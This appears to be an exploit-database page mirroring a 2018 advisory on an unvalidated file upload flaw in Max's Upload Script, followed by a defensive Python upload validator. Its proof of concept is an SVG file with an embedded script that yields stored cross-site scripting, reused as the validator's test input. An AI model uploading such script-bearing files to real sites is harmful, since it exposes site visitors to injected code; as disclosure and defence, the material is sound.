Max’s Upload Script Unvalidated File Upload Vulnerability

CVE: N/A
Category: CWE-434
Price: N/A
Severity: High
Author: N/A
Risk: High
Exploitation Type: Remote
Date: 2018-01-22
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010218

Below is a copy:

Max's Upload Script Unvalidated File Upload Vulnerability
[+] Exploit Title : Max's Upload Script Unvalidated File Upload Vulnerability

[+] Date : 2018-01-22

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor HomePage : http://www.xscript.ir

[+] Dork : N/A

[+] Version : 1.1

[+] Tested On : Windows 10 - Kali Linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Poc :

[*] Ajax File Upload is a script for uploading files

[*] But there is no security in this script

[*] And You Can Upload Any File, For Example SVG Files :

[*] You Can Use This Payload : 

[+] Payload :

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">
    alert('Hacked bY : 0P3N3R');
  </script>
</svg>
[+] Exploitation Technique:

[!] remote


[+] Severity Level:

[!] High



[+] We Are :

[!] 0P3N3R [+] Mehrdad_Ice [+] BaxTurk24 [+] S0hp
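The weakness the advisory reports is CWE-434: the upload handler stores whatever it receives, so an SVG carrying a script element becomes stored XSS once a browser opens it from the site's origin. The following is an added defensive example, not code from the advisory or from Max's Upload Script (whose implementation language the page does not state): a server-side check that enforces an extension allow-list, verifies content signatures, and refuses SVG documents containing script, event-handler attributes or javascript: links. The advisory's own SVG payload is embedded as the test input; the function and constant names are my own.

```python
import xml.etree.ElementTree as ET

# Extension allow-list with the byte signature the content must start with.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

def svg_is_active(data: bytes) -> bool:
    """True if an SVG document carries anything a browser would execute."""
    # ElementTree does not fetch the external DTD named in a DOCTYPE, but it is
    # not hardened against entity-expansion attacks; use defusedxml in production.
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True                      # unparsable XML: treat as hostile
    for el in root.iter():
        if el.tag.split("}")[-1].lower() in ("script", "foreignobject"):
            return True
        for attr, value in el.attrib.items():
            name = attr.split("}")[-1].lower()
            if name.startswith("on"):    # onload=, onclick=, ... event handlers
                return True
            if name == "href" and value.strip().lower().startswith("javascript:"):
                return True
    return False

def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Decide whether an uploaded file may be stored; returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "svg":
        # An SVG opened directly is a full document: embedded script runs in the
        # site's origin, so the content is inspected rather than the extension trusted.
        if svg_is_active(data):
            return False, "svg contains script or event handler"
        return True, "svg without active content"
    sig = MAGIC.get(ext)
    if sig is None:
        return False, f"extension .{ext or '<none>'} not allowed"
    if not data.startswith(sig):
        return False, "content does not match declared type"
    return True, "ok"

# The SVG payload from the advisory above, used here only as a test input.
SVG_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('Hacked bY : 0P3N3R');</script>
</svg>"""

if __name__ == "__main__":
    print(validate_upload("image.svg", SVG_PAYLOAD))   # (False, 'svg contains script or event handler')
```

Even an SVG that passes this check should be served with Content-Disposition: attachment or from a separate static-content origin, so that a bypass cannot execute in the application's origin.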

Copyright ©2024 Exploitalert.